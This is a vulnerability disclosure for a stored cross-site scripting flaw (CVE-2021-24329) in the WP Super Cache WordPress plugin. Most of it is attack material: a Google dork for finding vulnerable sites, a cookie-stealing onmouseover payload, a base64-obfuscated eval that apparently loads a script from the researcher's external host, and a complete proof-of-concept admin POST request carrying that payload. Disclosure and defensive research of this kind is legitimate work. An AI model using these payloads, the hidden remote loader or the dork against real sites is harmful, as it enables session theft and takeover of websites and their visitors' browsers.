/*! - # VULNERABILITY: WP Super Cache WordPress Plugin <= 1.7.2 - Authenticated Persistent XSS - # GOOGLE DORK: inurl:/wp-content/plugins/wp-super-cache/ - # DATE: 2021-03-23 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Automattic [ https://automattic.com ] - # SOFTWARE VERSION: <= 1.7.2 - # SOFTWARE LINK: https://ru.wordpress.org/plugins/wp-super-cache/ - # CVSS: AV:N/AC:L/PR:H/UI:R/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24329 */ ### -- [ Info: ] [i] An Authenticated Persistent XSS vulnerability was discovered in the WP Super Cache plugin through v1.7.2 for WordPress. [i] Vulnerable parameter(s): &wp_cache_location=. [i] This vulnerability also affects other plugins that display diagnostic/debug information and some security plugins. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] ";' onmouseover=alert(document.cookie); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; [$] ";' onmouseover=eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp`)); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; ### -- [ PoC | Authenticated Persistent XSS | Cache Location: ] [!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 773 Cookie: [admin cookies] _wpnonce=c6b9540023&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fexample.com%2Fwp-content%2Fcache%2F%22%3B%27+onmouseover%3Deval%28atob%28%60eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp%60%29%29%3B+style%3Dposition%3Afixed%3Bwidth%3A100%25%3Bheight%3A100%25%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3B+&_wpnonce=c6b9540023 ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze